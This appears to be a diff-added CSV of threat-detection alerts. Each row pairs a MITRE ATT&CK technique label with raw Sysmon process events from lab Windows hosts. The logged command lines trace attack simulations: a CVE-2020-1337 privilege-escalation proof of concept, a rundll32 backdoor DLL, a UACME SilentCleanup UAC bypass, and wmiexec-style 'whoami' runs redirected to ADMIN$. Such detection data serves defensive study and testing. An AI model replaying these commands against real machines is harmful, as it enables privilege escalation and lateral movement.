+ C:\Windows\system32\cmd.exe /c rmdir /s/q C:\ProgramData\Microsoft\Windows\WER\ReportQueue\a_b_c_d_e > nul 2>&1
+ C:\Users\Public\tools\PrivEsc\cve-2020-1337-poc-master\
+ MSEDGEWIN10\IEUser
+ 747F3D96-E911-5F33-0000-0020241C0400
+ 0x41c24
+ 1
+ Medium
+ SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18
+ 747F3D96-E938-5F33-0000-00109CA00E00
+ 7820
+ C:\Users\Public\tools\PrivEsc\cve-2020-1337-poc-master\WerTrigger.exe
+ WerTrigger.exe
+
+",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
+[T1059] Command-Line Interface,1579034897.412145,2020-01-15T00:48:17.412145+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( cmd.exe /c start ms-browser:// ),1,"
+
+
+
+
+ 1
+ 5
+ 4
+ 1
+ 0
+ 0x8000000000000000
+
+
+ 344
+
+
+
+
+ Microsoft-Windows-Sysmon/Operational
+ MSEDGEWIN10
+
+
+
+
+
+ 2020-01-14 20:48:16.990
+ 747F3D96-2910-5E1E-0000-001053F57C00
+ 4448
+ C:\Windows\System32\cmd.exe
+ 10.0.17763.1 (WinBuild.160101.0800)
+ Windows Command Processor
+ Microsoft® Windows® Operating System
+ Microsoft Corporation
+ Cmd.Exe
+ cmd.exe /c start ms-browser://
+ C:\Windows\system32\
+ MSEDGEWIN10\IEUser
+ 747F3D96-2910-5E1E-0000-002082EF7C00
+ 0x7cef82
+ 0
+ High
+ SHA1=08CC2E8DCA652BDDA1ACCA9C446560D4BC1BCDF9,MD5=0D088F5BCFA8F086FBA163647CD80CAB,SHA256=9023F8AAEDA4A1DA45AC477A81B5BBE4128E413F19A0ABFA3715465AD66ED5CD,IMPHASH=272245E2988E1E430500B852C4FB5E18
+ 747F3D96-2910-5E1E-0000-0010F5F07C00
+ 4612
+ C:\Windows\System32\wbem\WmiPrvSE.exe
+ C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
+
+",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
+[T1047] Windows Management Instrumentation - Process,1579034897.412145,2020-01-15T00:48:17.412145+04:00,,Threat,High,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( cmd.exe /c start ms-browser:// ),1,"
+
+
+
+
+ 1
+ 5
+ 4
+ 1
+ 0
+ 0x8000000000000000
+
+
+ 344
+
+
+
+
+ Microsoft-Windows-Sysmon/Operational
+ MSEDGEWIN10
+
+
+
+
+
+ 2020-01-14 20:48:16.990
+ 747F3D96-2910-5E1E-0000-001053F57C00
+ 4448
+ C:\Windows\System32\cmd.exe
+ 10.0.17763.1 (WinBuild.160101.0800)
+ Windows Command Processor
+ Microsoft® Windows® Operating System
+ Microsoft Corporation
+ Cmd.Exe
+ cmd.exe /c start ms-browser://
+ C:\Windows\system32\
+ MSEDGEWIN10\IEUser
+ 747F3D96-2910-5E1E-0000-002082EF7C00
+ 0x7cef82
+ 0
+ High
+ SHA1=08CC2E8DCA652BDDA1ACCA9C446560D4BC1BCDF9,MD5=0D088F5BCFA8F086FBA163647CD80CAB,SHA256=9023F8AAEDA4A1DA45AC477A81B5BBE4128E413F19A0ABFA3715465AD66ED5CD,IMPHASH=272245E2988E1E430500B852C4FB5E18
+ 747F3D96-2910-5E1E-0000-0010F5F07C00
+ 4612
+ C:\Windows\System32\wbem\WmiPrvSE.exe
+ C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
+
+",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
+[T1047] Windows Management Instrumentation - Instances of an Active Script Event Consumer - Process,1579034897.412145,2020-01-15T00:48:17.412145+04:00,,Threat,High,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( cmd.exe /c start ms-browser:// ),1,"
+
+
+
+
+ 1
+ 5
+ 4
+ 1
+ 0
+ 0x8000000000000000
+
+
+ 344
+
+
+
+
+ Microsoft-Windows-Sysmon/Operational
+ MSEDGEWIN10
+
+
+
+
+
+ 2020-01-14 20:48:16.990
+ 747F3D96-2910-5E1E-0000-001053F57C00
+ 4448
+ C:\Windows\System32\cmd.exe
+ 10.0.17763.1 (WinBuild.160101.0800)
+ Windows Command Processor
+ Microsoft® Windows® Operating System
+ Microsoft Corporation
+ Cmd.Exe
+ cmd.exe /c start ms-browser://
+ C:\Windows\system32\
+ MSEDGEWIN10\IEUser
+ 747F3D96-2910-5E1E-0000-002082EF7C00
+ 0x7cef82
+ 0
+ High
+ SHA1=08CC2E8DCA652BDDA1ACCA9C446560D4BC1BCDF9,MD5=0D088F5BCFA8F086FBA163647CD80CAB,SHA256=9023F8AAEDA4A1DA45AC477A81B5BBE4128E413F19A0ABFA3715465AD66ED5CD,IMPHASH=272245E2988E1E430500B852C4FB5E18
+ 747F3D96-2910-5E1E-0000-0010F5F07C00
+ 4612
+ C:\Windows\System32\wbem\WmiPrvSE.exe
+ C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
+
+",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
+[T1059] Command-Line Interface,1557970296.456891,2019-05-16T05:31:36.456891+04:00,,Threat,Low,Found User (insecurebank\Administrator) running image ( C:\Windows\System32\cmd.exe ) through command line ( C:\Windows\system32\cmd.exe /C ipconfig ),1,"
+
+
+
+
+ 1
+ 5
+ 4
+ 1
+ 0
+ 0x8000000000000000
+
+
+ 17985
+
+
+
+
+ Microsoft-Windows-Sysmon/Operational
+ DC1.insecurebank.local
+
+
+
+
+
+ 2019-05-16 01:31:36.443
+ DFAE8213-BD78-5CDC-0000-001091041300
+ 3136
+ C:\Windows\System32\cmd.exe
+ 6.3.9600.16384 (winblue_rtm.130821-1623)
+ Windows Command Processor
+ Microsoft® Windows® Operating System
+ Microsoft Corporation
+ C:\Windows\system32\cmd.exe /C ipconfig
+ C:\Users\administrator\
+ insecurebank\Administrator
+ DFAE8213-BD78-5CDC-0000-002005FE1200
+ 0x12fe05
+ 0
+ High
+ SHA1=7C3D7281E1151FE4127923F4B4C3CD36438E1A12,MD5=F5AE03DE0AD60F5B17B82F2CD68402FE,SHA256=6F88FB88FFB0F1D5465C2826E5B4F523598B1B8378377C8378FFEBC171BAD18B,IMPHASH=77AED1ADAF24B344F08C8AD1432908C3
+ DFAE8213-BD78-5CDC-0000-0010C7FE1200
+ 3948
+ C:\Windows\System32\winrshost.exe
+ C:\Windows\system32\WinrsHost.exe -Embedding
+
+",DC1.insecurebank.local,Microsoft-Windows-Sysmon/Operational
+[T1082] System Information Discovery,1556571562.144046,2019-04-30T00:59:22.144046+04:00,,Threat,Critical,System Information Discovery Process ( C:\Windows\System32\whoami.exe) ith commandline ( "C:\Windows\system32\whoami.exe" /all) ,1,"
+
+
+
+
+ 1
+ 5
+ 4
+ 1
+ 0
+ 0x8000000000000000
+
+
+ 8050
+
+
+
+
+ Microsoft-Windows-Sysmon/Operational
+ IEWIN7
+
+
+
+
+
+ 2019-04-29 20:59:22.128
+ 365ABB72-65AA-5CC7-0000-00104D882400
+ 2116
+ C:\Windows\System32\whoami.exe
+ 6.1.7600.16385 (win7_rtm.090713-1255)
+ whoami - displays logged on user information
+ Microsoft® Windows® Operating System
+ Microsoft Corporation
+ "C:\Windows\system32\whoami.exe" /all
+ C:\Users\IEUser\Documents\
+ IEWIN7\IEUser
+ 365ABB72-5B3A-5CC7-0000-002096080100
+ 0x10896
+ 1
+ High
+ SHA1=DC058F52AD8ACBD316827B6DCAC2434AB3CC515C,MD5=0EBF71E33EF09CA65D9683AFA999C473,SHA256=599EFD455AEEEFE2044A9B597061F271595033F5D0DF2C99DFDBCA8394BBCEC3,IMPHASH=C5352B949915AB8CD5E1844790D19274
+ 365ABB72-65A9-5CC7-0000-00104E5C2400
+ 3376
+ C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
+ "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -s -NoLogo -NoProfile
+
+",IEWIN7,Microsoft-Windows-Sysmon/Operational
+[ T0000 ] Suspicious process name detected,1556571562.144046,2019-04-30T00:59:22.144046+04:00,,Threat,High,User Name : ( IEWIN7\IEUser ) with Command Line : ( "C:\Windows\system32\whoami.exe" /all ) contain suspicious command ( whoami.exe),1,"
+
+
+
+
+ 1
+ 5
+ 4
+ 1
+ 0
+ 0x8000000000000000
+
+
+ 8050
+
+
+
+
+ Microsoft-Windows-Sysmon/Operational
+ IEWIN7
+
+
+
+
+
+ 2019-04-29 20:59:22.128
+ 365ABB72-65AA-5CC7-0000-00104D882400
+ 2116
+ C:\Windows\System32\whoami.exe
+ 6.1.7600.16385 (win7_rtm.090713-1255)
+ whoami - displays logged on user information
+ Microsoft® Windows® Operating System
+ Microsoft Corporation
+ "C:\Windows\system32\whoami.exe" /all
+ C:\Users\IEUser\Documents\
+ IEWIN7\IEUser
+ 365ABB72-5B3A-5CC7-0000-002096080100
+ 0x10896
+ 1
+ High
+ SHA1=DC058F52AD8ACBD316827B6DCAC2434AB3CC515C,MD5=0EBF71E33EF09CA65D9683AFA999C473,SHA256=599EFD455AEEEFE2044A9B597061F271595033F5D0DF2C99DFDBCA8394BBCEC3,IMPHASH=C5352B949915AB8CD5E1844790D19274
+ 365ABB72-65A9-5CC7-0000-00104E5C2400
+ 3376
+ C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
+ "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -s -NoLogo -NoProfile
+
+",IEWIN7,Microsoft-Windows-Sysmon/Operational
+Command run remotely Using WMI,1603490254.745175,2020-10-24T01:57:34.745175+04:00,,Threat,Critical,User (NT AUTHORITY\NETWORK SERVICE) run command through WMI with process (C:\Windows\System32\wbem\WmiPrvSE.exe) and commandline ( C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding ),1,"
+
+
+
+
+ 1
+ 5
+ 4
+ 1
+ 0
+ 0x8000000000000000
+
+
+ 423991
+
+
+
+
+ Microsoft-Windows-Sysmon/Operational
+ MSEDGEWIN10
+
+
+
+
+
+ 2020-10-23 21:57:29.192
+ 747F3D96-51C9-5F93-0000-001010175B00
+ 8796
+ C:\Windows\System32\wbem\WmiPrvSE.exe
+ 10.0.17763.1 (WinBuild.160101.0800)
+ WMI Provider Host
+ Microsoft® Windows® Operating System
+ Microsoft Corporation
+ Wmiprvse.exe
+ C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
+ C:\Windows\system32\
+ NT AUTHORITY\NETWORK SERVICE
+ 747F3D96-C50A-5F93-0000-0020E4030000
+ 0x3e4
+ 0
+ System
+ SHA1=67C25C8F28B5FA7F5BAA85BF1D2726AED48E9CF0,MD5=06C66FF5CCDC2D22344A3EB761A4D38A,SHA256=B5C78BEF3883E3099F7EF844DA1446DB29107E5C0223B97F29E7FAFAB5527F15,IMPHASH=CFECEDC01015A4FD1BAACAC9E592D88B
+ 00000000-0000-0000-0000-000000000000
+ 836
+ ?
+ ?
+
+",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
+[T1117] Bypassing Application Whitelisting,1584766825.569133,2020-03-21T09:00:25.569133+04:00,,Threat,High,"[T1117] Bypassing Application Whitelisting , Process ( C:\Windows\System32\rundll32.exe) with commandline ( rundll32 windowscoredeviceinfo.dll,CreateBackdoor)",1,"
+
+
+
+
+ 1
+ 5
+ 4
+ 1
+ 0
+ 0x8000000000000000
+
+
+ 243565
+
+
+
+
+ Microsoft-Windows-Sysmon/Operational
+ MSEDGEWIN10
+
+
+
+
+
+ 2020-03-21 05:00:25.544
+ 747F3D96-9F69-5E75-0000-0010729F2000
+ 3536
+ C:\Windows\System32\rundll32.exe
+ 10.0.17763.1 (WinBuild.160101.0800)
+ Windows host process (Rundll32)
+ Microsoft® Windows® Operating System
+ Microsoft Corporation
+ RUNDLL32.EXE
+ rundll32 windowscoredeviceinfo.dll,CreateBackdoor
+ C:\Windows\system32\
+ NT AUTHORITY\SYSTEM
+ 747F3D96-9DBA-5E75-0000-0020E7030000
+ 0x3e7
+ 0
+ System
+ SHA1=F3BA3415DD068A8871F285570BEA2E29874CBFF1,MD5=C73BA51880F5A7FB20C84185A23212EF,SHA256=01B407AF0200B66A34D9B1FA6D9EAAB758EFA36A36BB99B554384F59F8690B1A,IMPHASH=F27A7FC3A53E74F45BE370131953896A
+ 747F3D96-9DBC-5E75-0000-00102C390100
+ 1652
+ C:\Windows\System32\svchost.exe
+ C:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv
+
+",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
+"[T1117] Bypassing Application Whitelisting with Regsvr32,rundll32,certutil or scrobj ",1584766825.569133,2020-03-21T09:00:25.569133+04:00,,Threat,High,"Found User (NT AUTHORITY\SYSTEM) running image ( C:\Windows\System32\rundll32.exe ) through command line ( rundll32 windowscoredeviceinfo.dll,CreateBackdoor )",1,"
+
+
+
+
+ 1
+ 5
+ 4
+ 1
+ 0
+ 0x8000000000000000
+
+
+ 243565
+
+
+
+
+ Microsoft-Windows-Sysmon/Operational
+ MSEDGEWIN10
+
+
+
+
+
+ 2020-03-21 05:00:25.544
+ 747F3D96-9F69-5E75-0000-0010729F2000
+ 3536
+ C:\Windows\System32\rundll32.exe
+ 10.0.17763.1 (WinBuild.160101.0800)
+ Windows host process (Rundll32)
+ Microsoft® Windows® Operating System
+ Microsoft Corporation
+ RUNDLL32.EXE
+ rundll32 windowscoredeviceinfo.dll,CreateBackdoor
+ C:\Windows\system32\
+ NT AUTHORITY\SYSTEM
+ 747F3D96-9DBA-5E75-0000-0020E7030000
+ 0x3e7
+ 0
+ System
+ SHA1=F3BA3415DD068A8871F285570BEA2E29874CBFF1,MD5=C73BA51880F5A7FB20C84185A23212EF,SHA256=01B407AF0200B66A34D9B1FA6D9EAAB758EFA36A36BB99B554384F59F8690B1A,IMPHASH=F27A7FC3A53E74F45BE370131953896A
+ 747F3D96-9DBC-5E75-0000-00102C390100
+ 1652
+ C:\Windows\System32\svchost.exe
+ C:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv
+
+",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
+[T1059] Command-Line Interface,1597237560.737148,2020-08-12T17:06:00.737148+04:00,,Threat,Low,Found User (NT AUTHORITY\SYSTEM) running image ( C:\Windows\System32\cmd.exe ) through command line ( C:\Windows\system32\cmd.exe /c reg query "HKLM\Software\WOW6432Node\Npcap" /ve 2>nul | find "REG_SZ" ),1,"
+
+
+
+
+ 1
+ 5
+ 4
+ 1
+ 0
+ 0x8000000000000000
+
+
+ 342409
+
+
+
+
+ Microsoft-Windows-Sysmon/Operational
+ MSEDGEWIN10
+
+
+
+
+
+ 2020-08-12 13:05:38.149
+ 747F3D96-E922-5F33-0000-00107A2B0B00
+ 6952
+ C:\Windows\System32\cmd.exe
+ 10.0.17763.592 (WinBuild.160101.0800)
+ Windows Command Processor
+ Microsoft® Windows® Operating System
+ Microsoft Corporation
+ Cmd.Exe
+ C:\Windows\system32\cmd.exe /c reg query "HKLM\Software\WOW6432Node\Npcap" /ve 2>nul | find "REG_SZ"
+ C:\Windows\system32\
+ NT AUTHORITY\SYSTEM
+ 747F3D96-E909-5F33-0000-0020E7030000
+ 0x3e7
+ 0
+ System
+ SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18
+ 747F3D96-E90A-5F33-0000-0010863C0100
+ 1740
+ C:\Windows\System32\cmd.exe
+ C:\Windows\SYSTEM32\cmd.exe /c ""C:\Program Files\Npcap\CheckStatus.bat""
+
+",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
+[T1059] Command-Line Interface,1564825609.436856,2019-08-03T13:46:49.436856+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( "C:\Windows\system32\cmd.exe"\system32\cleanmgr.exe /autoclean /d C: ),1,"
+
+
+
+
+ 1
+ 5
+ 4
+ 1
+ 0
+ 0x8000000000000000
+
+
+ 5134
+
+
+
+
+ Microsoft-Windows-Sysmon/Operational
+ MSEDGEWIN10
+
+
+
+
+
+ 2019-08-03 09:46:49.331
+ 747F3D96-5809-5D45-0000-00100B233F00
+ 1380
+ C:\Windows\System32\cmd.exe
+ 10.0.17763.1 (WinBuild.160101.0800)
+ Windows Command Processor
+ Microsoft® Windows® Operating System
+ Microsoft Corporation
+ "C:\Windows\system32\cmd.exe"\system32\cleanmgr.exe /autoclean /d C:
+ C:\Windows\system32\
+ MSEDGEWIN10\IEUser
+ 747F3D96-56A3-5D45-0000-0020B3D31800
+ 0x18d3b3
+ 1
+ High
+ SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18
+ 747F3D96-D4EA-5D45-0000-00105CD60000
+ 1072
+ C:\Windows\System32\svchost.exe
+ C:\Windows\system32\svchost.exe -k netsvcs -p -s Schedule
+
+",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
+[T1085] Rundll32 Execution detected,1584766825.569133,2020-03-21T09:00:25.569133+04:00,,Threat,High,"Found User (NT AUTHORITY\SYSTEM) running image ( C:\Windows\System32\rundll32.exe ) through command line ( rundll32 windowscoredeviceinfo.dll,CreateBackdoor )",1,"
+
+
+
+
+ 1
+ 5
+ 4
+ 1
+ 0
+ 0x8000000000000000
+
+
+ 243565
+
+
+
+
+ Microsoft-Windows-Sysmon/Operational
+ MSEDGEWIN10
+
+
+
+
+
+ 2020-03-21 05:00:25.544
+ 747F3D96-9F69-5E75-0000-0010729F2000
+ 3536
+ C:\Windows\System32\rundll32.exe
+ 10.0.17763.1 (WinBuild.160101.0800)
+ Windows host process (Rundll32)
+ Microsoft® Windows® Operating System
+ Microsoft Corporation
+ RUNDLL32.EXE
+ rundll32 windowscoredeviceinfo.dll,CreateBackdoor
+ C:\Windows\system32\
+ NT AUTHORITY\SYSTEM
+ 747F3D96-9DBA-5E75-0000-0020E7030000
+ 0x3e7
+ 0
+ System
+ SHA1=F3BA3415DD068A8871F285570BEA2E29874CBFF1,MD5=C73BA51880F5A7FB20C84185A23212EF,SHA256=01B407AF0200B66A34D9B1FA6D9EAAB758EFA36A36BB99B554384F59F8690B1A,IMPHASH=F27A7FC3A53E74F45BE370131953896A
+ 747F3D96-9DBC-5E75-0000-00102C390100
+ 1652
+ C:\Windows\System32\svchost.exe
+ C:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv
+
+",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
+[T1082] System Information Discovery,-11644473600.0,1601-01-01T04:00:00+04:00,,Threat,Critical,System Information Discovery Process ( C:\Windows\System32\whoami.exe) ith commandline ( whoami /all ) ,1,"
+
+
+
+
+ 1
+ 5
+ 4
+ 1
+ 0
+ 0x8000000000000000
+
+
+ 9840
+
+
+
+
+ Microsoft-Windows-Sysmon/Operational
+ IEWIN7
+
+
+
+
+
+ 2019-04-30 20:35:13.527
+ 365ABB72-B181-5CC8-0000-00108DC71E00
+ 692
+ C:\Windows\System32\whoami.exe
+ 6.1.7600.16385 (win7_rtm.090713-1255)
+ whoami - displays logged on user information
+ Microsoft® Windows® Operating System
+ Microsoft Corporation
+ whoami /all
+ C:\
+ IEWIN7\IEUser
+ 365ABB72-B17F-5CC8-0000-0020C6A31E00
+ 0x1ea3c6
+ 0
+ High
+ SHA1=DC058F52AD8ACBD316827B6DCAC2434AB3CC515C,MD5=0EBF71E33EF09CA65D9683AFA999C473,SHA256=599EFD455AEEEFE2044A9B597061F271595033F5D0DF2C99DFDBCA8394BBCEC3,IMPHASH=C5352B949915AB8CD5E1844790D19274
+ 365ABB72-B181-5CC8-0000-001023C41E00
+ 1256
+ C:\Windows\System32\cmd.exe
+ "C:\Windows\System32\cmd.exe" /Q /c whoami /all 1> \\127.0.0.1\ADMIN$\__1556656511.61 2>&1
+
+",IEWIN7,Microsoft-Windows-Sysmon/Operational
+Command run remotely Using WMI,-11644473600.0,1601-01-01T04:00:00+04:00,,Threat,Critical,User (NT AUTHORITY\NETWORK SERVICE) run command through WMI with process (C:\Windows\System32\wbem\WmiPrvSE.exe) and commandline ( C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding ),1,"
+
+
+
+
+ 1
+ 5
+ 4
+ 1
+ 0
+ 0x8000000000000000
+
+
+ 422746
+
+
+
+
+ Microsoft-Windows-Sysmon/Operational
+ MSEDGEWIN10
+
+
+
+
+
+ 2020-10-20 22:35:26.747
+ 747F3D96-662E-5F8F-0000-001023353800
+ 6748
+ C:\Windows\System32\wbem\WmiPrvSE.exe
+ 10.0.17763.1 (WinBuild.160101.0800)
+ WMI Provider Host
+ Microsoft® Windows® Operating System
+ Microsoft Corporation
+ Wmiprvse.exe
+ C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
+ C:\Windows\system32\
+ NT AUTHORITY\NETWORK SERVICE
+ 747F3D96-E130-5F8F-0000-0020E4030000
+ 0x3e4
+ 0
+ System
+ SHA1=67C25C8F28B5FA7F5BAA85BF1D2726AED48E9CF0,MD5=06C66FF5CCDC2D22344A3EB761A4D38A,SHA256=B5C78BEF3883E3099F7EF844DA1446DB29107E5C0223B97F29E7FAFAB5527F15,IMPHASH=CFECEDC01015A4FD1BAACAC9E592D88B
+ 00000000-0000-0000-0000-000000000000
+ 840
+ ?
+ ?
+
+",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
+[T1059] Command-Line Interface,1597237545.570757,2020-08-12T17:05:45.570757+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( "C:\Windows\system32\cmd.exe" ),1,"
+
+
+
+
+ 1
+ 5
+ 4
+ 1
+ 0
+ 0x8000000000000000
+
+
+ 342408
+
+
+
+
+ Microsoft-Windows-Sysmon/Operational
+ MSEDGEWIN10
+
+
+
+
+
+ 2020-08-12 13:05:36.545
+ 747F3D96-E920-5F33-0000-001043920A00
+ 5128
+ C:\Windows\System32\cmd.exe
+ 10.0.17763.592 (WinBuild.160101.0800)
+ Windows Command Processor
+ Microsoft® Windows® Operating System
+ Microsoft Corporation
+ Cmd.Exe
+ "C:\Windows\system32\cmd.exe"
+ C:\Users\IEUser\
+ MSEDGEWIN10\IEUser
+ 747F3D96-E911-5F33-0000-0020241C0400
+ 0x41c24
+ 1
+ Medium
+ SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18
+ 747F3D96-E914-5F33-0000-001009990500
+ 5144
+ C:\Windows\explorer.exe
+ C:\Windows\Explorer.EXE
+
+",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
+[T1053] Scheduled Task - Process,1564825609.40255,2019-08-03T13:46:49.402550+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\schtasks.exe ) through command line ( "C:\Windows\System32\schtasks.exe" /run /tn "\Microsoft\Windows\DiskCleanup\SilentCleanup" /i ),1,"
+
+
+
+
+ 1
+ 5
+ 4
+ 1
+ 0
+ 0x8000000000000000
+
+
+ 5133
+
+
+
+
+ Microsoft-Windows-Sysmon/Operational
+ MSEDGEWIN10
+
+
+
+
+ Persistence - Scheduled Task Management
+ 2019-08-03 09:46:48.842
+ 747F3D96-5808-5D45-0000-0010D1FE3E00
+ 1268
+ C:\Windows\System32\schtasks.exe
+ 10.0.17763.1 (WinBuild.160101.0800)
+ Task Scheduler Configuration Tool
+ Microsoft® Windows® Operating System
+ Microsoft Corporation
+ "C:\Windows\System32\schtasks.exe" /run /tn "\Microsoft\Windows\DiskCleanup\SilentCleanup" /i
+ C:\Users\IEUser\Desktop\
+ MSEDGEWIN10\IEUser
+ 747F3D96-56A3-5D45-0000-0020FBD31800
+ 0x18d3fb
+ 1
+ Medium
+ SHA1=112C8FFA1C0934ACAAD2C58B3C7E81F3FB8E4A2C,MD5=3F9FD6D3B3E96B8F576DB72035DB38A7,SHA256=D6BA2CD73799477C051D9D864C47FCF5108064CDE07D3565871AFA10FC548086,IMPHASH=7EE4BC5589713B3470B8A950256E2E69
+ 747F3D96-5808-5D45-0000-00106CDC3E00
+ 924
+ C:\Users\IEUser\Desktop\UACME.exe
+ UACME.exe 34
+
+",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
+[T1059] Command-Line Interface,1556656513.543589,2019-05-01T00:35:13.543589+04:00,,Threat,Low,Found User (IEWIN7\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( "C:\Windows\System32\cmd.exe" /Q /c whoami /all 1> \\127.0.0.1\ADMIN$\__1556656511.61 2>&1 ),1,"
+
+
+
+
+ 1
+ 5
+ 4
+ 1
+ 0
+ 0x8000000000000000
+
+
+ 9839
+
+
+
+
+ Microsoft-Windows-Sysmon/Operational
+ IEWIN7
+
+
+
+
+
+ 2019-04-30 20:35:13.512
+ 365ABB72-B181-5CC8-0000-001023C41E00
+ 1256
+ C:\Windows\System32\cmd.exe
+ 6.1.7601.17514 (win7sp1_rtm.101119-1850)
+ Windows Command Processor
+ Microsoft® Windows® Operating System
+ Microsoft Corporation
+ "C:\Windows\System32\cmd.exe" /Q /c whoami /all 1> \\127.0.0.1\ADMIN$\__1556656511.61 2>&1
+ C:\
+ IEWIN7\IEUser
+ 365ABB72-B17F-5CC8-0000-0020C6A31E00
+ 0x1ea3c6
+ 0
+ High
+ SHA1=EE8CBF12D87C4D388F09B4F69BED2E91682920B5,MD5=AD7B9C14083B52BC532FBA5948342B98,SHA256=17F746D82695FA9B35493B41859D39D786D32B23A9D2E00F4011DEC7A02402AE,IMPHASH=CEEFB55F764020CC5C5F8F23349AB163
+ 365ABB72-B17F-5CC8-0000-001082A51E00
+ 3572
+ C:\Windows\System32\mmc.exe
+ C:\Windows\system32\mmc.exe -Embedding
+
+",IEWIN7,Microsoft-Windows-Sysmon/Operational
+[T1077] Windows Admin Shares - Process - Created,1558661633.192601,2019-05-24T05:33:53.192601+04:00,,Threat,High,Found User (IIS APPPOOL\DefaultAppPool) running image ( C:\Windows\System32\net.exe ) through command line ( net user ),1,"
+
+
+
+
+ 1
+ 5
+ 4
+ 1
+ 0
+ 0x8000000000000000
+
+
+ 1046
+
+
+
+
+ Microsoft-Windows-Sysmon/Operational
+ IEWIN7
+
+
+
+
+
+ 2019-05-24 01:33:53.152
+ 365ABB72-4A01-5CE7-0000-00102DA1AC00
+ 788
+ C:\Windows\System32\net.exe
+ 6.1.7600.16385 (win7_rtm.090713-1255)
+ Net Command
+ Microsoft® Windows® Operating System
+ Microsoft Corporation
+ net user
+ c:\windows\system32\inetsrv\
+ IIS APPPOOL\DefaultAppPool
+ 365ABB72-45C7-5CE7-0000-002092F99C00
+ 0x9cf992
+ 0
+ High
+ SHA1=9A544E2094273741AA2D3E7EA0AF303AF2B587EA,MD5=B9A4DAC2192FD78CDA097BFA79F6E7B2,SHA256=D468E6B1B79555AC8BCE0300942FD479689EB8F159F3A399848D3BF9B9990A56,IMPHASH=B1F584304D1C7F2899A954905D8318C7
+ 365ABB72-4A01-5CE7-0000-0010EE9DAC00
+ 2404
+ C:\Windows\System32\cmd.exe
+ "c:\windows\system32\cmd.exe" /c net user
+
+",IEWIN7,Microsoft-Windows-Sysmon/Operational
+[T1082] System Information Discovery,1556656372.402964,2019-05-01T00:32:52.402964+04:00,,Threat,Critical,System Information Discovery Process ( C:\Windows\System32\whoami.exe) ith commandline ( whoami /all ) ,1,"
+
+
+
+
+ 1
+ 5
+ 4
+ 1
+ 0
+ 0x8000000000000000
+
+
+ 9829
+
+
+
+
+ Microsoft-Windows-Sysmon/Operational
+ IEWIN7
+
+
+
+
+
+ 2019-04-30 20:32:51.356
+ 365ABB72-B0F3-5CC8-0000-0010373E1D00
+ 3328
+ C:\Windows\System32\whoami.exe
+ 6.1.7600.16385 (win7_rtm.090713-1255)
+ whoami - displays logged on user information
+ Microsoft® Windows® Operating System
+ Microsoft Corporation
+ whoami /all
+ C:\
+ IEWIN7\IEUser
+ 365ABB72-B0F2-5CC8-0000-00203D311D00
+ 0x1d313d
+ 0
+ High
+ SHA1=DC058F52AD8ACBD316827B6DCAC2434AB3CC515C,MD5=0EBF71E33EF09CA65D9683AFA999C473,SHA256=599EFD455AEEEFE2044A9B597061F271595033F5D0DF2C99DFDBCA8394BBCEC3,IMPHASH=C5352B949915AB8CD5E1844790D19274
+ 365ABB72-B0F3-5CC8-0000-0010C43A1D00
+ 2828
+ C:\Windows\System32\cmd.exe
+ cmd.exe /Q /c whoami /all 1> \\127.0.0.1\ADMIN$\__1556656369.7 2>&1
+
+",IEWIN7,Microsoft-Windows-Sysmon/Operational
+[T1077] Windows Admin Shares - Network,1558661633.192601,2019-05-24T05:33:53.192601+04:00,,Threat,High,Found User (IIS APPPOOL\DefaultAppPool) running image ( C:\Windows\System32\net.exe ) through command line ( net user ),1,"
+
+
+
+
+ 1
+ 5
+ 4
+ 1
+ 0
+ 0x8000000000000000
+
+
+ 1046
+
